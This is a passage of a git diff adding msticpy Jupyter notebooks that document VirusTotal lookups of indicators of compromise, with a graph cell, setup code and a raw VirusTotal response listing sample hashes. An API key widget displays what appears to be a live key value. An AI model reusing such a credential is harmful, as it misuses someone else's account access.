le\"},{\"attributes\":{\"data_source\":{\"id\":\"2561\"},\"glyph\":{\"id\":\"2560\"},\"hover_glyph\":null,\"muted_glyph\":null,\"view\":{\"id\":\"2563\"}},\"id\":\"2562\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"2553\",\"type\":\"BasicTicker\"},{\"attributes\":{},\"id\":\"2704\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"2721\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"end\":1.1,\"start\":-1.1},\"id\":\"2540\",\"type\":\"Range1d\"},{\"attributes\":{\"formatter\":{\"id\":\"2704\"},\"ticker\":{\"id\":\"2549\"}},\"id\":\"2548\",\"type\":\"LinearAxis\"},{\"attributes\":{\"end\":1.1,\"start\":-1.1},\"id\":\"2542\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"2711\",\"type\":\"NodesOnly\"}],\"root_ids\":[\"2537\"]},\"title\":\"Bokeh Application\",\"version\":\"2.2.2\"}};\n  var render_items = [{\"docid\":\"44502671-1afb-4199-98a3-94af624af738\",\"root_ids\":[\"2537\"],\"roots\":{\"2537\":\"ca627f0b-ab19-482b-acc3-f77a04a27cd2\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "2537"
+      }
+     }
+    }
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "## Integration with VTGraph\n",
+    "\n",
+    "Once we have some DataFrames with the relationships, we are able to generate and visualize a VT Graph in our notebook. The function `create_vt_graph` accepts as input a **list of Relationship DataFrames**.\n",
+    "\n",
+    "> **Note:** it can take some time to generate the graph, depending on the number of nodes and relationships.\n",
+    "\n",
+    "Unlike our local graph, this displays rich information about the nodes and relationship and allows us to expand our investigation with further searches or ad hoc nodes.\n",
+    "\n",
+    "> **Note:** - the inline graph displays node attributes but doesn't allow you edit or to add to the graph with further searches.<br>\n",
+    "> Click on the link in the frame to go to the VirusTotal site to view."
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 12,
+   "source": [
+    "graph_id = vt_lookup.create_vt_graph(\r\n",
+    "    relationship_dfs=[example_relationship_df, example_multiple_relationship_df],\r\n",
+    "    name=\"My first Jupyter Notebook Graph\",\r\n",
+    "    private=False,\r\n",
+    ")\r\n",
+    "graph_id"
+   ],
+   "outputs": [
+    {
+     "output_type": "execute_result",
+     "data": {
+      "text/plain": [
+       "'g20091e04457e441ab3d061480caf5e3c626208e1da5a41e08522f78b4e31b574'"
+      ]
+     },
+     "metadata": {},
+     "execution_count": 12
+    }
+   ],
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-10-27T21:35:31.697172Z",
+     "start_time": "2020-10-27T21:34:31.666782Z"
+    }
+   }
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 13,
+   "source": [
+    "vt_lookup.render_vt_graph(\r\n",
+    "    graph_id = graph_id,\r\n",
+    "    width = 900,\r\n",
+    "    height = 600\r\n",
+    ")"
+   ],
+   "outputs": [
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ],
+      "text/html": [
+       "\n",
+       "              <iframe\n",
+       "                src=\"https://www.virustotal.com/graph/embed/g20091e04457e441ab3d061480caf5e3c626208e1da5a41e08522f78b4e31b574\"\n",
+       "                width=\"900\"\n",
+       "                height=\"600\">\n",
+       "              </iframe>\n",
+       "\n",
+       "            "
+      ]
+     },
+     "metadata": {}
+    }
+   ],
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-10-27T21:52:51.571327Z",
+     "start_time": "2020-10-27T21:52:51.558327Z"
+    }
+   }
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "source": [],
+   "outputs": [],
+   "metadata": {}
+  }
+ ],
+ "metadata": {
+  "hide_input": false,
+  "kernelspec": {
+   "display_name": "Python (condadev)",
+   "language": "python",
+   "name": "condadev"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.7.9"
+  },
+  "latex_envs": {
+   "LaTeX_envs_menu_present": true,
+   "autoclose": false,
+   "autocomplete": true,
+   "bibliofile": "biblio.bib",
+   "cite_by": "apalike",
+   "current_citInitial": 1,
+   "eqLabelWithNumbers": true,
+   "eqNumInitial": 1,
+   "hotkeys": {
+    "equation": "Ctrl-E",
+    "itemize": "Ctrl-I"
+   },
+   "labels_anchors": false,
+   "latex_user_defs": false,
+   "report_style_numbering": false,
+   "user_envs_cfg": false
+  },
+  "toc": {
+   "base_numbering": 1,
+   "nav_menu": {},
+   "number_sections": false,
+   "sideBar": true,
+   "skip_h1_title": false,
+   "title_cell": "Table of Contents",
+   "title_sidebar": "Contents",
+   "toc_cell": false,
+   "toc_position": {},
+   "toc_section_display": true,
+   "toc_window_display": true
+  },
+  "varInspector": {
+   "cols": {
+    "lenName": 16,
+    "lenType": 16,
+    "lenVar": 40
+   },
+   "kernels_config": {
+    "python": {
+     "delete_cmd_postfix": "",
+     "delete_cmd_prefix": "del ",
+     "library": "var_list.py",
+     "varRefreshCmd": "print(var_dic_list())"
+    },
+    "r": {
+     "delete_cmd_postfix": ") ",
+     "delete_cmd_prefix": "rm(",
+     "library": "var_list.r",
+     "varRefreshCmd": "cat(var_dic_list()) "
+    }
+   },
+   "types_to_exclude": [
+    "module",
+    "function",
+    "builtin_function_or_method",
+    "instance",
+    "_Feature"
+   ],
+   "window_display": false
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {},
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
\ No newline at end of file
diff --git a/docs/notebooks/VirusTotalLookup.ipynb b/docs/notebooks/VirusTotalLookup.ipynb
new file mode 100644
index 000000000..36d4f94f4
--- /dev/null
+++ b/docs/notebooks/VirusTotalLookup.ipynb
@@ -0,0 +1,2111 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Title: msticpy - VirusTotal Lookup\n",
+    "\n",
+    "## Disclaimer and Acknowledgements:\n",
+    "The code in this module is offered as a convenience wrapper for the VirusTotal API based on the [public documentation](https://www.virustotal.com/en/documentation/public-api/). The code does not originate from VirusTotal, nor is it endorsed by them. I'd like thank them for\n",
+    "- Wonderfully clear documention and examples\n",
+    "- Granting me extra querying capacity for my account for testing\n",
+    "\n",
+    "You must have msticpy installed to run this notebook:\n",
+    "```\n",
+    "%pip install --upgrade msticpy\n",
+    "```\n",
+    "\n",
+    "## New Features ##\n",
+    "This is quite and old notebook and some developments largely supercede this\n",
+    "component.\n",
+    "- Virus Total queries have been integrated into the core TILookup functionality in MSTICPy\n",
+    "  See the [TIProviders notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/TIProviders.ipynb)\n",
+    "  and the [TIProviders documentation](https://msticpy.readthedocs.io/en/latest/data_acquisition/TIProviders.html)\n",
+    "  for more details\n",
+    "  \n",
+    "- VirusTotal V3 API - VT have release a new version of their API which allows graph\n",
+    "  traversal to get information about how malware and actors are linked.\n",
+    "  See the [VT3Lookup notebook](https://github.com/microsoft/msticpy/blob/master/docs/notebooks/VTLookupV3.ipynb)\n",
+    "  for more details\n",
+    "\n",
+    "## Introduction\n",
+    "This class allows you to submit Indicators of Compromise (IoC) to VirusTotal and receive and process the content of the response. You can submit a single item or a set of items in a column of a pandas DataFrame.\n",
+    "\n",
+    "\n",
+    "\n",
+    "VirusTotal supports the following IoC Types:\n",
+    "- FileHash\n",
+    "- URL\n",
+    "- IP Address (v4)\n",
+    "- DNS Domain\n",
+    "\n",
+    "The first two of these result in full reports of malicious content from scans. The IP Address and DNS items provide secondary lookup - e.g. if IP Address 111.222.3.5 or www.evil.net is linked to a positive (malicious) report for a URL, the latter report will be returned in the results. VT does not report directly on the reputation of IP addresses or DNS domains.\n",
+    "\n",
+    "## Virus Total Lookup\n",
+    "To use this module need an API key from virus total, which you can obtain here: https://www.virustotal.com/.\n",
+    "\n",
+    "Note that VT throttles requests for free API keys to 4/minute. If you are unable to process the entire data set, try splitting it and submitting smaller chunks.\n",
+    "\n",
+    "**Things to note:**\n",
+    "- Virus Total lookups include file hashes, domains, IP addresses and URLs.\n",
+    "- The returned data is slightly different depending on the input type\n",
+    "- The VTLookup class tries to screen input data to prevent pointless lookups. E.g.:\n",
+    "  - Only public IP Addresses will be submitted (no loopback, private address space, etc.)\n",
+    "  - URLs with only local (unqualified) host parts will not be submitted.\n",
+    "  - Domain names that are unqualified will not be submitted.\n",
+    "  - Hash-like strings (e.g 'AAAAAAAAAAAAAAAAAA') that do not appear to have enough entropy to be a hash will not be submitted.\n",
+    "  - If submitted in a batch (i.e. using a DataFrame as input) duplicate IoCs are not submitted. Duplicates will be given the results from the original lookip \n",
+    "\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='contents'></a>\n",
+    "## Table of Contents\n",
+    "- [VirusTotal API Key](#api_key)\n",
+    "- [Looking up Single IoC](#single_ioc_lookup)\n",
+    "- [Interpreting the Output](#interpreting_output)\n",
+    "- [Using a DataFrame as input](#dataframe_input)\n",
+    "\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "metadata": {
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <script>\n",
+       "    function code_toggle() {\n",
+       "        if ($('div.cell.code_cell.rendered.selected div.input').css('display')!='none'){\n",
+       "            $('div.cell.code_cell.rendered.selected div.input').hide();\n",
+       "        } else {\n",
+       "            $('div.cell.code_cell.rendered.selected div.input').show();\n",
+       "        }\n",
+       "    }\n",
+       "    </script>\n",
+       "\n"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# Imports\n",
+    "import sys\n",
+    "MIN_REQ_PYTHON = (3,6)\n",
+    "if sys.version_info < MIN_REQ_PYTHON:\n",
+    "    print('Check the Kernel->Change Kernel menu and ensure that Python 3.6')\n",
+    "    print('or later is selected as the active kernel.')\n",
+    "    sys.exit(\"Python %s.%s or later is required.\\n\" % MIN_REQ_PYTHON)\n",
+    "\n",
+    "\n",
+    "from IPython.display import display\n",
+    "import pandas as pd\n",
+    "\n",
+    "import msticpy.sectools as sectools\n",
+    "import msticpy.nbtools as mas\n",
+    "from msticpy.sectools import VTLookup, IoCExtract"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='api_key'></a>[Contents](#contents)\n",
+    "## You will need a VirusTotal API key\n",
+    "You will get more detailed results if you have a private API key but you can get a lot of good information using the public API and a free API key. You are however limited in the number of requests you can make."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "53d22ab2a3084f0aac5b491da3a6e466",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "HBox(children=(Text(value='fbe87704dae3d315967145642dedc8cf3301fa8186fc1358090aea9bb334b755', description='Vir…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# Enter your VT Key here\n",
+    "vt_key = mas.GetEnvironmentKey(env_var='VT_API_KEY',\n",
+    "                           help_str='To obtain an API key sign up here https://www.virustotal.com/',\n",
+    "                           prompt='Virus Total API key:')\n",
+    "vt_key.display()"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "# Create an instance of the class\n",
+    "\n",
+    "vt_lookup = sectools.VTLookup(vt_key.value, verbosity=2)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "<a id='single_ioc_lookups'></a>[Contents](#contents)\n",
+    "## Looking up Single IoCs\n",
+    "```\n",
+    "Signature: vt_lookup.lookup_ioc(observable: str, ioc_type: str, output: str = 'dict')\n",
+    "Docstring:\n",
+    "Look up and single IoC observable.\n",
+    "\n",
+    "    :param observable: The observable value\n",
+    "    :param ioc_type: The IoC Type (see 'supported_ioc_types' attribute)\n",
+    "    :param output='dict': Output results as a dictionary (or list of dicts)\n",
+    "        if output is any other value the result will be returned in a\n",
+    "        Pandas DataFrame\n",
+    "\n",
+    "    Returns:\n",
+    "        list{dict}: if output == 'dict'\n",
+    "        pd.DataFrame: otherwise\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 4,
+   "metadata": {
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "{'Observable': '90.156.201.97',\n",
+       " 'IoCType': 'ipv4',\n",
+       " 'Status': 'Success',\n",
+       " 'ResponseCode': 1,\n",
+       " 'RawResponse': '{\"undetected_downloaded_samples\": [{\"date\": \"2019-03-12 19:02:12\", \"positives\": 0, \"total\": 46, \"sha256\": \"5c51cf182781dbd3fdbe3fe8a6e01742ab02729cf9c4c2450f3699ab15fd7ba9\"}, {\"date\": \"2018-12-08 12:29:43\", \"positives\": 0, \"total\": 70, \"sha256\": \"1c879f33fdfdad829682b3572652178b4d8344d6b1001fabafea2e6897cd7c5a\"}, {\"date\": \"2019-02-27 17:31:43\", \"positives\": 0, \"total\": 57, \"sha256\": \"78342a0905a72ce44da083dcb5d23b8ea0c16992ba2a82eece97e033d76ba3d3\"}, {\"date\": \"2019-02-11 13:06:10\", \"positives\": 0, \"total\": 71, \"sha256\": \"0f774764181a1d850141bf64393228b7acdb6261844f0165a78839f549d7bcce\"}, {\"date\": \"2019-02-13 19:22:34\", \"positives\": 0, \"total\": 55, \"sha256\": \"13e5f2a6c4bbed674eea0e0bff9a78fc9b38a5b1f83fb69552b4673fe796e8c0\"}, {\"date\": \"2019-02-13 06:12:51\", \"positives\": 0, \"total\": 56, \"sha256\": \"7aada93462e39cd1370151b2dfe6254328d2b8e16dc927cb56689fc1334ee86c\"}, {\"date\": \"2019-02-12 10:17:57\", \"positives\": 0, \"total\": 47, \"sha256\": \"0eef76a9583a6c7a1eb764d33fe376bfe1861df79fab82c2c3f5d16183e82016\"}, {\"date\": \"2019-02-07 15:51:46\", \"positives\": 0, \"total\": 43, \"sha256\": \"a283ade31ca47bcc13b6062ee025b2ccd8ec33d67c10749841ce4dc7f5c3562d\"}, {\"date\": \"2019-02-05 18:09:42\", \"positives\": 0, \"total\": 56, \"sha256\": \"65bfaed04c98c3a513e7aaef5a3da485b9b0a8cd36949fc44a4d73d107f8fc98\"}, {\"date\": \"2019-02-05 18:09:26\", \"positives\": 0, \"total\": 59, \"sha256\": \"36fe54090569bd3c9f81bbce5f4a52de185735f1de8376e6d4ac15c68dc56161\"}, {\"date\": \"2017-03-21 05:05:01\", \"positives\": 0, \"total\": 64, \"sha256\": \"928f363f91c87838f8fa8613abbf1ce17e12234d094af1a17b5c873d8f12754b\"}, {\"date\": \"2019-01-23 22:14:19\", \"positives\": 0, \"total\": 69, \"sha256\": \"9b98dbd4070a8ad3c8cdb08f70b305c68a147d37d7ac90f783e2baa8f0a38a91\"}, {\"date\": \"2019-01-23 21:32:11\", \"positives\": 0, \"total\": 70, \"sha256\": \"2368aab964018b4221282180133e186ba84167aa5dfdbb7d2759a2fbfdb41e86\"}, {\"date\": \"2019-01-13 18:37:40\", \"positives\": 0, \"total\": 60, \"sha256\": \"e11f67d94ac42f6550f86c86a304bb7e9737c268257498f6b3f23fae13d0a0b7\"}, {\"date\": \"2019-01-10 13:35:02\", \"positives\": 0, \"total\": 58, \"sha256\": \"ff6d14f77e27f7b90cb2f20bce408189f5f388961f3fcd13fe2df2cc0a002dc3\"}, {\"date\": \"2019-01-02 16:18:06\", \"positives\": 0, \"total\": 56, \"sha256\": \"603bc8d59899c0e3c54da4892eb5ee9a43f6df0e252150b9601de49b5ecc2a16\"}, {\"date\": \"2018-12-27 13:56:02\", \"positives\": 0, \"total\": 54, \"sha256\": \"c496580702d2e62f1bd1e9fda3d0872c3995f4f44ee34f85f3dc09ac449cd402\"}, {\"date\": \"2018-09-12 20:23:51\", \"positives\": 0, \"total\": 71, \"sha256\": \"9ecdf64c96e3c913936ab8edf8af595d6316488bbb8851745c2d2d005fecc037\"}, {\"date\": \"2018-12-22 09:32:20\", \"positives\": 0, \"total\": 57, \"sha256\": \"7b55ce8653fc86a046f32d67386a1b78a574a1aa6446f2cd3d62d505efe6781e\"}, {\"date\": \"2018-02-20 02:05:13\", \"positives\": 0, \"total\": 71, \"sha256\": \"7af969549caa9e23235f5d8b50c9c554dfc0181e8ed2a879c42c6af507759d24\"}, {\"date\": \"2018-02-17 19:02:24\", \"positives\": 0, \"total\": 70, \"sha256\": \"4fc4b9d4730c44b6b525b1eb1a75a4bcda889e007d274c817d53b095cfec66f4\"}, {\"date\": \"2018-12-21 05:53:15\", \"positives\": 0, \"total\": 59, \"sha256\": \"58bf01ed4796b86da22eff0190b26b09d84a359a9129ebb8fc916c9d5b926a4c\"}, {\"date\": \"2018-11-03 14:24:10\", \"positives\": 0, \"total\": 69, \"sha256\": \"dc545edf152d5546bac52edfb9c69054cdee49a874270b3aebf76f3e1dbcd3af\"}, {\"date\": \"2018-12-13 13:07:43\", \"positives\": 0, \"total\": 56, \"sha256\": \"2e19034dccc07af64d40c147d76284f42c877e86d1a0527b847a03d1f45fb488\"}, {\"date\": \"2018-12-04 10:48:33\", \"positives\": 0, \"total\": 70, \"sha256\": \"799aeb25cc0373fdee0e1b1db7ad6c2f6a0e058dfadaa3379689f583213190bd\"}, {\"date\": \"2018-08-23 13:35:51\", \"positives\": 0, \"total\": 71, \"sha256\": \"446c53263851409a30dffc2ac5006dd1298be2856a74016d23f7c3169d66fc0a\"}, {\"date\": \"2018-12-11 10:15:59\", \"positives\": 0, \"total\": 57, \"sha256\": \"b69bfcf8345160db31a61bacd1cf5f36184e2f2b999913c9dfcf0064e24ce5c7\"}, {\"date\": \"2018-12-07 02:46:36\", \"positives\": 0, \"total\": 58, \"sha256\": \"fc48d1d80ece71a79a7b39877f4104d49d3da6c3665cf6dc203000fb7df4447e\"}, {\"date\": \"2017-04-30 17:26:10\", \"positives\": 0, \"total\": 65, \"sha256\": \"87b34f2c1c4c30f70478efc10c6c026f9311019f028157314717e6ddfa4c1f4b\"}, {\"date\": \"2018-11-14 15:30:40\", \"positives\": 0, \"total\": 45, \"sha256\": \"3998aaff4acf90f989daafb381b2137ead238ec5156806e31f8e9f89121f3eba\"}, {\"date\": \"2018-11-12 20:44:29\", \"positives\": 0, \"total\": 60, \"sha256\": \"101f5f3e7de72a8c83a7a979cff65378ad007cd208f3eb4766a62ab4f5cbfadb\"}, {\"date\": \"2018-10-23 07:23:26\", \"positives\": 0, \"total\": 56, \"sha256\": \"918f8590c1168556a9bb39ade45db989de55ef66ec75765fe5975d426febf9d2\"}, {\"date\": \"2018-10-11 11:39:24\", \"positives\": 0, \"total\": 58, \"sha256\": \"b5318ac100f7dc6756f712e319e37178338d0a63a4c1eff3ed41ef5c3c599138\"}, {\"date\": \"2018-10-11 02:09:17\", \"positives\": 0, \"total\": 57, \"sha256\": \"6f71d6b966d58885e3f39cf01a1264b13097840ec770805be551c5f920de0aac\"}, {\"date\": \"2018-10-06 17:28:00\", \"positives\": 0, \"total\": 57, \"sha256\": \"0b52c5338af355699530a47683420e48c7344e779d3e815ff9943cbfdc153cf2\"}, {\"date\": \"2018-09-24 22:28:53\", \"positives\": 0, \"total\": 59, \"sha256\": \"b0ff2eeec626c8a0a6041ae8ce41f7da790fa21a15bb6bad743fb8c41048c45d\"}, {\"date\": \"2018-09-20 02:48:00\", \"positives\": 0, \"total\": 57, \"sha256\": \"777c35521d06c73a3596405bbffe0cf64e49ffb91291243a8e7eda4f3b741ea2\"}, {\"date\": \"2018-09-17 12:10:04\", \"positives\": 0, \"total\": 55, \"sha256\": \"233e50c4720e52b35b8911baffba5b6eb48793fe8cd538461c705309847e075c\"}, {\"date\": \"2018-09-05 03:18:00\", \"positives\": 0, \"total\": 59, \"sha256\": \"6fec642eb6b60ac1f3fa68ceef752c9d45eb5aeb2ae091f641bf4d40f2e1c80a\"}, {\"date\": \"2018-09-05 00:38:30\", \"positives\": 0, \"total\": 60, \"sha256\": \"8f772a80b5b770a0d7e77305668bc726e676da50f15b118036cea6c0e6ebcbd1\"}, {\"date\": \"2018-09-02 20:00:38\", \"positives\": 0, \"total\": 60, \"sha256\": \"db12cabaea04dd9eccb73ee3410a3efeeaeb5c0189a643e8a73f1ca9d51e3280\"}, {\"date\": \"2018-08-28 12:28:10\", \"positives\": 0, \"total\": 69, \"sha256\": \"b1e5fc0c284e4b731279af7c700e87572a938d50cd905cb9c2d45ddbc7ba124d\"}, {\"date\": \"2018-08-23 21:52:09\", \"positives\": 0, \"total\": 54, \"sha256\": \"50fa4a027518ce62619b1ccbd705497b09994641e19cfca452928c0bcde57bda\"}, {\"date\": \"2018-08-17 06:23:58\", \"positives\": 0, \"total\": 68, \"sha256\": \"8e9d11db7a2c91ad7f118e1157cc1a3c928fcd24a7f99e18f87cf5cd0b8977e8\"}, {\"date\": \"2016-01-12 08:06:41\", \"positives\": 0, \"total\": 55, \"sha256\": \"2a7a0cbfe70de4931b5d04fcabc17639bdaa3c42a979060cd6a85bd07d0e0624\"}, {\"date\": \"2018-08-10 06:22:36\", \"positives\": 0, \"total\": 59, \"sha256\": \"2650b6c78d92b678bbbeba3ab0d50c48f6a8075588be9b96052b58f6b6c67deb\"}, {\"date\": \"2018-08-08 20:40:32\", \"positives\": 0, \"total\": 60, \"sha256\": \"40f0f2b6fb558157e1f065445b213802aae1d65e46cf436098844f0347cafb46\"}, {\"date\": \"2018-08-07 03:37:15\", \"positives\": 0, \"total\": 59, \"sha256\": \"cb2f00d1e554baf96001ddb5e22ee63a8053fd3f8b6cad8acd74504af0dadb52\"}, {\"date\": \"2018-08-03 02:17:01\", \"positives\": 0, \"total\": 57, \"sha256\": \"2805f83c35d69fba167a0a8e3e8daca1b22cf3f655afcd5a11847865f1b717e1\"}, {\"date\": \"2018-08-01 22:21:32\", \"positives\": 0, \"total\": 60, \"sha256\": \"1bceef7c068df552b688e82f2a84e7291fce89aee9a69f02eec28a7392801f93\"}, {\"date\": \"2018-08-01 22:21:25\", \"positives\": 0, \"total\": 59, \"sha256\": \"95e1f180a6e1c677a8cbf8101b8f0077a5ed7c86aba8e46c90285ea22ccda90f\"}, {\"date\": \"2018-07-31 21:38:24\", \"positives\": 0, \"total\": 60, \"sha256\": \"dc1d54dab6ec8c00f70137927504e4f222c8395f10760b6beecfcfa94e08249f\"}, {\"date\": \"2018-07-29 10:20:07\", \"positives\": 0, \"total\": 60, \"sha256\": \"3d8e94fed6cc8ea56ee5ec6174efb68cb7197d2e729149cb43e85505bf175779\"}, {\"date\": \"2018-07-28 03:31:12\", \"positives\": 0, \"total\": 54, \"sha256\": \"19f1f50daa78cc928e6550e4a563128503c0e2a543a7b07d6096972d6c355aef\"}, {\"date\": \"2018-07-28 00:45:10\", \"positives\": 0, \"total\": 54, \"sha256\": \"16d279b775099a79bee35d554cbfd914f16ef0088fa2e6763e79c0a8aba4cc75\"}, {\"date\": \"2018-07-26 23:24:19\", \"positives\": 0, \"total\": 44, \"sha256\": \"62679839da5c4d95a02f264f790498a1b47628aecbe67898792aff25f8cfc94e\"}, {\"date\": \"2018-07-20 02:21:51\", \"positives\": 0, \"total\": 57, \"sha256\": \"dd973ffb47385f17ebb5bb6ba99cf16b968e151f0004b565f8386ae7ce1753bb\"}, {\"date\": \"2018-07-19 19:51:35\", \"positives\": 0, \"total\": 59, \"sha256\": \"6be70110418f9738ca23c6d61d73ce3c0cb01087843c96de5ced119c5ab882c6\"}, {\"date\": \"2018-07-17 03:49:28\", \"positives\": 0, \"total\": 54, \"sha256\": \"0e4890c031bfb1263800986cfe99b907fe93f9bcf8e90cee582ba203f17b6289\"}, {\"date\": \"2018-07-15 04:56:27\", \"positives\": 0, \"total\": 54, \"sha256\": \"6c401627a6bd0a8fa0be8f9558d99199e02054d12844f179e764a2dd21e7eac2\"}, {\"date\": \"2018-07-13 14:01:57\", \"positives\": 0, \"total\": 55, \"sha256\": \"3d7611f1256ba2175f448aa6348fc6b7dad5d5cb0c160f4e547b2dd6a1fe321a\"}, {\"date\": \"2018-07-13 07:38:12\", \"positives\": 0, \"total\": 54, \"sha256\": \"e3f2fb262505cd1b5a07d02b3e8c9d536040ec9122b27c6e12d09ebf2e1b11af\"}, {\"date\": \"2018-07-10 05:03:47\", \"positives\": 0, \"total\": 54, \"sha256\": \"70565e5669917fc8a878ca442c81d3becf467c3488c1ea238158c8dfbb4006af\"}, {\"date\": \"2018-07-10 03:20:05\", \"positives\": 0, \"total\": 54, \"sha256\": \"5c15d6cc24625cc94bb347964ddacabb54d25524c593916f88201cec64130289\"}, {\"date\": \"2018-07-10 01:34:57\", \"positives\": 0, \"total\": 57, \"sha256\": \"7a6db1dc6fa8c83df1b10799cd628e2b27dc63e7f761c9e24abfb4343fdd6b2b\"}, {\"date\": \"2018-07-09 15:18:10\", \"positives\": 0, \"total\": 0, \"sha256\": \"f0e25f557cfd4846fa574c9ba81a4a395099881a454077d5a0fb557352908db7\"}, {\"date\": \"2018-07-09 13:18:28\", \"positives\": 0, \"total\": 58, \"sha256\": \"dd97b0d0dbe320653cdf05afe115e481577a67895bfd1d55d9b3d9c692c52da9\"}, {\"date\": \"2018-07-09 07:21:47\", \"positives\": 0, \"total\": 54, \"sha256\": \"c760c63a91d7acae36096bb52eb337cd20adef0f9b824d634bab486a035848b1\"}, {\"date\": \"2018-07-08 15:11:21\", \"positives\": 0, \"total\": 55, \"sha256\": \"573896132a67735da4f6d25a430292f34eff01a808a0eb254b80a774911ec01b\"}, {\"date\": \"2018-07-06 10:20:13\", \"positives\": 0, \"total\": 46, \"sha256\": \"ea0e6087d7aef2ff48420f9bf047b615af23eda32118bb7e306d87b9b80d8459\"}, {\"date\": \"2018-07-04 08:48:17\", \"positives\": 0, \"total\": 60, \"sha256\": \"b6682cab65d3243b5b75efb7279dbf49491957484780f2ba0a87632cc0e25642\"}, {\"date\": \"2018-06-22 21:58:46\", \"positives\": 0, \"total\": 71, \"sha256\": \"b1f5b9c329d8f4c9bb9d4b2dc820419b8a277e2886af023777a399c9ec187a2c\"}, {\"date\": \"2018-04-20 05:45:40\", \"positives\": 0, \"total\": 70, \"sha256\": \"53272d9acc56c08a6e1e0d53fdbc8597ca0edb8238c708c3fa8e171ce6fd7235\"}, {\"date\": \"2017-01-19 10:53:42\", \"positives\": 0, \"total\": 58, \"sha256\": \"364fb7df27c718f44b16139fc8602aebc62bd09dc64202ebd2728d9d87bf7bbd\"}, {\"date\": \"2018-06-16 20:12:09\", \"positives\": 0, \"total\": 56, \"sha256\": \"a48f2ea1a85825a7c1199703e21fc6161007f49585a3cd04a66ff660c7ded156\"}, {\"date\": \"2018-06-16 10:42:28\", \"positives\": 0, \"total\": 61, \"sha256\": \"59e1421fe9ff18e71f898c1ec79c664136d5297f8ba2fd1b9f303eb315087781\"}, {\"date\": \"2018-06-06 22:06:29\", \"positives\": 0, \"total\": 53, \"sha256\": \"a8f9b0a090b08f64f1c4cd1d51e19798068f61e70f315e85d618a2ecaf35d2a7\"}, {\"date\": \"2018-06-06 00:26:42\", \"positives\": 0, \"total\": 66, \"sha256\": \"43b90204c88f31bd3ad5accf6a18c28ada414fa1390946b4c1daa26962388a27\"}, {\"date\": \"2017-12-26 10:16:47\", \"positives\": 0, \"total\": 69, \"sha256\": \"60bd8e918a6173985bd425783676171e59cdf1dbe16a782813f00327bac608cb\"}, {\"date\": \"2018-06-01 07:53:22\", \"positives\": 0, \"total\": 60, \"sha256\": \"190eaf5314ce40535bae11eafc459cdb7b3a61560444581d09257ced4846407e\"}, {\"date\": \"2018-05-31 14:30:11\", \"positives\": 0, \"total\": 60, \"sha256\": \"a49a0fa9f2cf2eb724196910fce5ed3d8d2a76a881393aaefbf95240d3c5590f\"}, {\"date\": \"2018-05-30 04:36:18\", \"positives\": 0, \"total\": 52, \"sha256\": \"6d801cddc0009a608ad897d950e198027ab8ff87593adb8b7fe318434b7fdc44\"}, {\"date\": \"2018-05-27 11:35:03\", \"positives\": 0, \"total\": 55, \"sha256\": \"cf1a405da1efe02bc40c4a263b657599f8209832a824b787b5e1315f5f7a3cad\"}, {\"date\": \"2017-03-19 13:54:42\", \"positives\": 0, \"total\": 63, \"sha256\": \"e6f88b05374924230f6bc8b0cfb1418a2bd271aaea92830b7ccbe6dfffc0657f\"}, {\"date\": \"2016-01-27 09:30:10\", \"positives\": 0, \"total\": 54, \"sha256\": \"ee7f6100f6876a5f6993cf955d044d81889d2053713239b0af4db93273ded0db\"}, {\"date\": \"2018-05-18 09:36:45\", \"positives\": 0, \"total\": 60, \"sha256\": 